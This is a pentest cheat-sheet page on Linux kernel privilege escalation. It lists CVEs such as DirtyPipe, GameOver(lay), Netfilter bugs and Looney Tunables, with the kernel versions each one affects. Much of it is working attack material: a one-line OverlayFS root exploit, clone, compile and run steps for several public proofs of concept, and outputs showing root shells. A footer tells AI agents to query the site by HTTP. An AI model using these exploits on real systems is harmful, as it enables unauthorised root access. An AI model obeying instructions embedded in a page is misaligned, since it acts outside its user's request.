# Kernel Exploits [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Linux Kernel Version ``` uname -a Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux ``` Linux Kernel 4.4.0-116 ```shell-session $ uname -r 5.10.5-051005-generic ``` ```shell-session $ cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS" ``` {% hint style="info" %} *Kernel exploits can cause system instability so use caution when running these against a production system.* {% endhint %} ### Google "Linux Kernel XXX exploit" and/or "OS XXX exploit"

### Linux Exploit Suggester {% embed url="" %}

### Metasploit - Local Exploit Suggester {% embed url="" %} ## DirtyFrag {% embed url="" %} ## Fragnesia {% embed url="" %} ## ssh-keysign-pwn {% embed url="" %} ## CVE-2026-31431 - CopyFail {% embed url="" %} {% embed url="" %}

## Universal local privilege escalation - CVE-2024-1086 - Linux kernels between v5.14 and v6.6 including Debian, Ubuntu, and KernelCTF **See Releases:** {% embed url="" %} ## DirtyCow - Linux Kernel 2.6.22 < 3.9 {% embed url="" %} {% embed url="" %} ## Linux Kernel 4.4.0-116 {% embed url="" %} ```shell-session gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit ``` ```shell-session $ ./kernel_exploit task_struct = ffff8800b71d7000 uidptr = ffff8800b95ce544 spawning root shell ``` ## Ubuntu 21.10 with kernel 5.13.0-37 - {% embed url="" %}

## Ubuntu - CVE-2021-3493 OverlayFS * Ubuntu 20.10 * Ubuntu 20.04 LTS * Ubuntu 19.04 * Ubuntu 18.04 LTS * Ubuntu 16.04 LTS * Ubuntu 14.04 ESM {% embed url="" %} ## CVE-2022-23222 - Linux Kernel eBPF Local Privilege Escalation Linux kernel through 5.15.14 {% embed url="" %} ## CVE-2022-0995 The exploit targets Ubuntu 21.10 with kernel `5.13.0-37` {% embed url="" %} ## Ubuntu - CVE-2023-32629 & CVE-2023-2640 ``` unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' ``` {% embed url="" %} {% embed url="" %} ## GameOver(lay) Ubuntu PrivEsc - CVE-2023-2640-CVE-2023-32629 | Kernel version | Ubuntu release | | -------------- | ----------------------------------------------------------------- | | 6.2.0 | Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish) | | 5.19.0 | Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish) | | 5.4.0 | Ubuntu 22.04 LTS (Local Fossa) / Ubuntu 18.04 LTS (Bionic Beaver) | {% embed url="" %} ## CVE-2023-35001 Kernel 5.19.0-35 {% embed url="" %} {% embed url="" %} ## CVE-2023-0386 - OverlayFS vulnerability kernel version lower than 6.2. Ubuntu 22.04 {% embed url="" %} {% embed url="" %} {% embed url="" %} Ubuntu 22.04 {% embed url="" %} ## CVE-2023-32233 Linux kernel through 6.3 - Tested on Ubuntu 23.04 (Lunar Lobster). {% embed url="" %} ## CVE-2023-4911 - Looney Tunables Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13 {% embed url="" %} {% embed url="" %} ## Ubuntu 24.04 {% embed url="" %} ## Dirty Pipe - 5.8 to 5.17 All kernels from version `5.8` to `5.17` {% embed url="" %} ```shell-session $ git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git $ cd CVE-2022-0847-DirtyPipe-Exploits $ bash compile.sh ``` ### Exploit 1 ```shell-session $ ./exploit-1 Backing up /etc/passwd to /tmp/passwd.bak ... Setting root password to "piped"... Password: Restoring /etc/passwd from /tmp/passwd.bak... Done! Popping shell... (run commands now) id uid=0(root) gid=0(root) groups=0(root) ``` ### Exploit 2 ```shell-session $ find / -perm -4000 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/snapd/snap-confine /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/xorg/Xorg.wrap /usr/sbin/pppd /usr/bin/chfn /usr/bin/su /usr/bin/chsh /usr/bin/umount /usr/bin/passwd /usr/bin/fusermount /usr/bin/sudo /usr/bin/vmware-user-suid-wrapper /usr/bin/gpasswd /usr/bin/mount /usr/bin/pkexec /usr/bin/newgrp ``` ```shell-session $ ./exploit-2 /usr/bin/sudo [+] hijacking suid binary.. [+] dropping suid shell.. [+] restoring suid binary.. [+] popping root shell.. (dont forget to clean up /tmp/sh ;)) # id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(cry0l1t3) ``` ## Netfilter ### **CVE-2021-22555 - 2.6 - 5.11** Vulnerable kernel versions: 2.6 - 5.11 ```shell-session $ uname -r 5.10.5-051005-generic ``` {% embed url="" %} ```shell-session $ wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c $ gcc -m32 -static exploit.c -o exploit $ ./exploit [+] Linux Privilege Escalation by theflow@ - 2021 [+] STAGE 0: Initialization [*] Setting up namespace sandbox... [*] Initializing sockets and message queues... [+] STAGE 1: Memory corruption [*] Spraying primary messages... [*] Spraying secondary messages... [*] Creating holes in primary messages... [*] Triggering out-of-bounds write... [*] Searching for corrupted primary message... [+] fake_idx: fff [+] real_idx: fdf ...SNIP... root@ubuntu:/home/cry0l1t3# id uid=0(root) gid=0(root) groups=0(root) ``` ### **CVE-2022-25636 - 4.5 - 5.6.10** Linux kernel 5.4 through 5.6.10 ```shell-session $ uname -r 5.13.0-051300-generic ``` {% embed url="" %} ```shell-session $ git clone https://github.com/Bonfee/CVE-2022-25636.git $ cd CVE-2022-25636 $ make $ ./exploit [*] STEP 1: Leak child and parent net_device [+] parent net_device ptr: 0xffff991285dc0000 [+] child net_device ptr: 0xffff99128e5a9000 [*] STEP 2: Spray kmalloc-192, overwrite msg_msg.security ptr and free net_device [+] net_device struct freed [*] STEP 3: Spray kmalloc-4k using setxattr + FUSE to realloc net_device [+] obtained net_device struct [*] STEP 4: Leak kaslr [*] kaslr leak: 0xffffffff823093c0 [*] kaslr base: 0xffffffff80ffefa0 [*] STEP 5: Release setxattrs, free net_device, and realloc it again [+] obtained net_device struct [*] STEP 6: rop :) # id uid=0(root) gid=0(root) groups=0(root) ``` ### CVE-2022-1015 - 5.12 - 5.17 Kernels after commit 345023b0db31 (v5.12) but before commit 6e1acfa387b9 (v5.17) are vulnerable. {% embed url="" %} ### **CVE-2023-32233 - Up to 6.3.1** Linux Kernel up to version `6.3.1` {% embed url="" %} ```shell-session $ git clone https://github.com/Liuk3r/CVE-2023-32233 $ cd CVE-2023-32233 $ gcc -Wall -o exploit exploit.c -lmnl -lnftnl ``` ```shell-session $ ./exploit [*] Netfilter UAF exploit Using profile: ======== 1 race_set_slab # {0,1} 1572 race_set_elem_count # k 4000 initial_sleep # ms 100 race_lead_sleep # ms 600 race_lag_sleep # ms 100 reuse_sleep # ms 39d240 free_percpu # hex 2a8b900 modprobe_path # hex 23700 nft_counter_destroy # hex 347a0 nft_counter_ops # hex a nft_counter_destroy_call_offset # hex ffffffff nft_counter_destroy_call_mask # hex e8e58948 nft_counter_destroy_call_check # hex ======== [*] Checking for available CPUs... [*] sched_getaffinity() => 0 2 [*] Reserved CPU 0 for PWN Worker [*] Started cpu_spinning_loop() on CPU 1 [*] Started cpu_spinning_loop() on CPU 2 [*] Started cpu_spinning_loop() on CPU 3 [*] Creating "/tmp/modprobe"... [*] Creating "/tmp/trigger"... [*] Updating setgroups... [*] Updating uid_map... [*] Updating gid_map... [*] Signaling PWN Worker... [*] Waiting for PWN Worker... ...SNIP... [*] You've Got ROOT:-) # id uid=0(root) gid=0(root) groups=0(root) ``` ## CVE-2025-38001 Debian 12 PoC {% embed url="" %} ## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/kernel-exploits.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.